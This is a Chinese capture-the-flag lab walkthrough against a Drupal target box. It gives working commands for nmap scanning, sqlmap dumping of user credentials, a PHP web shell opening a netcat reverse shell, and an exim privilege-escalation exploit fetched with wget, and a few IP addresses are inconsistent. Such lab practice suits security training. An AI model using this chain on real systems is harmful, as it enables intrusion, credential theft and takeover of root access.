KALI:192.168.78.131
靶机:192.168.78.141
查询存活主机,扫面开放端口:
ifconfig
nmap -sP 192.168.78.0/24
nmap -p 1-65535 -A -sV 192.168.78.140
访问80端口:
采用的是Durpal框架,该框架在DC-1系列也出现过。
那这里先扫描一下域名,再看下服务,最后再MSF查询
dirsearch发现一个登录界面
访问登陆界面:
考虑到爆破 先查询一下MSF该框架有无漏洞
都不能使用
再次看看开放的业务,发现sql注入:
很明显的SQL注入漏洞,直接上sqlmap
sqlmap -u http://192.168.43.18/?nid=0%27 --dbs
发现数据库 d7db 继续爆表
sqlmap -u "http://192.168.78.141/?nid=2" -D d7db --tables
找到users ,继续爆字段
sqlmap -u "http://192.168.78.141/?nid=2" -D d7db -T users --columns
发现 name和pass的字段
sqlmap -u http://192.168.78.141/?nid=2 -D d7db -T users -C name,pass --dump
很显然需要john解密
拿到密码 :turtle
去登陆,浏览下业务
写个shell
<p> this is a test </p>
<?php
system("nc -e /bin/bash 192.168.182.137 2333");
?>
反弹成功
python -c 'import pty;pty.spawn("/bin/bash")'
查看suid
find / -perm -u=s -type f 2>/dev/null
发现可疑目标
查询一下本机的版本
exim --version
查询POC
searchexploit exim 4
开启FTP,把脚本文件上传到靶机/tmp目录即可
FTP连接,发现靶机没有开启FTP服务
那就开启端口,并且把46996.sh放到/tmp目录下
python -m SimpleHTTPServer 8000
wget http://192.168.78.131:8000/46996.sh
再下载之前先对46996.sh进行编辑
: set ff =unix 使windows的代码可以在unix上运行 #除了这种方法的话下面这种可以
dos2unix 46996.sh #将文件转换成unix格式
然后下载执行即可
chmod +x 46996.sh
./46996.sh -m netcat
拿到Root权限
查找一个flag的位置
find / -name "*lag*" 2> /dev/null
拿到flag